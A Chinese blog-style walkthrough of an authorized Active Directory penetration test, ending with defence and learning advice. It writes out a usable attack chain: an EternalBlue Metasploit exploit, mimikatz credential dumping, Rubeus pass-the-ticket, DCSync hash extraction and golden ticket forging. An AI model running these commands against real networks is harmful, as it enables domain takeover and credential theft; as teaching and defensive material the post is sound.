1. 内网渗透实战:从零开始的域环境突破
我至今记得第一次完整拿下域控时那种混合着成就感和后怕的复杂心情。那次渗透测试中,我在客户允许的范围内,用最基础的技巧穿透了三层网络隔离,最终获取了域管理员权限。整个过程没有任何高端操作,全是基础工具和逻辑链条的叠加。这也让我深刻意识到:企业内网安全最薄弱的环节往往不是技术,而是人的认知盲区。
域渗透本质上是一场关于信任边界的游戏。当一台加入域的工作电脑开机时,它会自动信任域控制器颁发的任何令牌;当域管理员登录某台服务器时,这台服务器会无条件执行所有指令。这种默认的信任关系,正是攻击者最爱的突破口。下面我就用那次实战经历为蓝本,拆解完整的域渗透链条——注意,所有技术仅限授权测试使用。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 环境搭建与信息收集
2.1 实验环境拓扑
典型的域结构包含以下角色:
- 域控制器(DC):运行Active Directory服务,通常为Windows Server
- 成员服务器:运行SQL、文件共享等服务的服务器
- 工作站:员工日常办公电脑
- 网络设备:交换机、防火墙等
在我的测试环境中,目标网络采用经典的三层架构:
code复制互联网边界防火墙 → Web服务器(DMZ区) → 内网防火墙 → 办公网络(192.168.1.0/24) → 核心交换机 → 服务器区(10.10.1.0/24)
2.2 初始立足点获取
通过社会工程学获取到一位员工的邮箱凭证后,我使用以下工具链进行初步侦察:
bash复制# 基础网络探测
nmap -sV -O 192.168.1.0/24 -oA initial_scan
# 域信息枚举(需已获取域账号)
ldapsearch -x -H ldap://192.168.1.10 -D "user@domain" -w password -b "dc=domain,dc=com"
关键发现:
- 域控制器IP:192.168.1.10 (WIN-DC01)
- 域名称:CORPDOMAIN
- 存在未更新的Windows 7工作站(漏洞CVE-2017-0144)
3. 横向移动与权限提升
3.1 利用MS17-010漏洞
检测到易受攻击的主机后,使用Metasploit模块进行利用:
ruby复制use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.15
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
成功获取SYSTEM权限后,立即进行以下操作:
- 转储内存中的凭据(mimikatz)
- 提取浏览器保存的密码(LaZagne)
- 查看RDP连接历史(cmdkey /list)
3.2 票据传递攻击(PtT)
从内存中获取的域用户凭证中,发现一个属于HelpDesk组的账号。使用该账号请求Kerberos票据:
powershell复制# 请求高权限服务票据
.\Rubeus.exe asktgt /user:helpdesk_admin /domain:corpdomain.com /rc4:[NTLM哈希] /nowrap
# 注入票据
.\Rubeus.exe ptt /ticket:[Base64编码的票据]
4. 域控攻防实战
4.1 DCSync攻击
获取HelpDesk组权限后,发现该组被意外添加了"复制目录更改"权限(Replicating Directory Changes),这允许我们模拟域控制器行为:
powershell复制# 获取所有域用户哈希
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corpdomain.com /user:Administrator"'
# 或者使用secretsdump.py
secretsdump.py corpdomain.com/helpdesk_admin@192.168.1.10 -hashes :[NTLM哈希]
4.2 Golden Ticket制作
获取krbtgt账户的哈希后,可以伪造任意用户的TGT票据:
powershell复制.\mimikatz.exe "kerberos::golden /user:Administrator /domain:corpdomain.com /sid:S-1-5-21-... /krbtgt:[krbtgt哈希] /ptt"
5. 防御措施与检测建议
5.1 企业防护方案
-
网络分段:
- 业务网与办公网严格隔离
- 域控制器仅允许必需端口(如TCP/88,389,636)
-
权限控制:
- 遵循最小权限原则
- 定期审计敏感组的成员(如Domain Admins)
-
监控重点:
- 异常票据请求(如非DC机器请求DCSync)
- 敏感进程行为(如lsass.exe内存读取)
5.2 个人防护技巧
- 工作站防护:
powershell复制# 禁用NTLM认证 Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "LmCompatibilityLevel" -Value 5 # 启用Credential Guard Enable-WindowsOptionalFeature -Online -FeatureName "DeviceGuard" -All
6. 学习路径建议
6.1 基础技能树
-
网络协议:
- TCP/IP协议栈
- HTTP/SMB/LDAP/Kerberos等应用层协议
-
Windows体系:
- Active Directory架构
- 认证流程(NTLM/Kerberos)
-
工具链:
mermaid复制graph LR A[信息收集] --> B(Nmap/BloodHound) C[漏洞利用] --> D(Metasploit/CobaltStrike) E[后渗透] --> F(Mimikatz/Impacket)
6.2 实战平台推荐
- Hack The Box(VIP区有完整域环境)
- TryHackMe的"Attacktive Directory"模块
- 本地搭建的FLARE VM环境
那次渗透测试最终报告写了37页,客户CTO看完后立即启动了全网的权限审计。技术本身没有善恶,关键在于使用者的意图——这也是为什么我始终坚持只做授权测试。真正的网络安全工程师,应该是用黑客的思维来构建防御,而不是相反。
